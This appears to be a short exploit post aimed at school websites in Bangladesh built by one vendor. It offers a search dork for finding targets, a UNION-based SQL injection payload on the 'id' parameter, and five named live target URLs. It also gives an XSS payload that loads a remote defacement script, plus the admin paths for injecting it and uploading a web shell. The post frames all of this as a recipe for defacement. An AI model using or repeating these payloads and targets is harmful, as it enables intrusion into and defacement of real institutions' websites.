#Title: WAN IT LTD SQl/XSS Deface
#Dork: intext:"WAN IT LTD" inurl:"id=" +"site:edu.bd"
#Date: 26.10.2017
#Test: W10
#CWEs: CWE-89
#Exploit Discovered By: Informacion - Anonymous
#Author: mr.Gh0st N@0b
#======================#
#P00f:
#http://site.com/about_us.php?menu=aboutus&id=-about-0000001 {Inject}
|---
Parameter: id (GET)
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: menu=aboutus&id=-8681' UNION ALL SELECT NULL,CONCAT(0x716b766a71,0x67
495a756b546c697068424a6759715a545a4a4255787748667350656953787a65746450734b4e6f,0x7
16a7a7171)-- Satn
Vector: UNION ALL SELECT NULL,[QUERY][GENERIC_SQL_COMMENT]
---|
#Admin Panel
#http://site.com/admin/ {login Here}
#Dem0s:
#http://sonarhatsnc.edu.bd/about_us.php…
#http://rwahs.edu.bd/about_us.php…
#http://rwahs.edu.bd/about_us.php…
#http://www.gozkhalimlths.edu.bd/about_us.php…
#http://coghighschool.edu.bd/about_us.php…
#XSS Alert
#/admin/add_news.php?menu=news {Exploit XSS Script}
#Example
#<script src="http://yourdeface.js"></script>
#<META http-equiv="refresh" content="1;URL=yourdefacepage">
#Upload Shell
#/admin/add_gallery.php?menu=gallery {Upload Here}
#===========================================#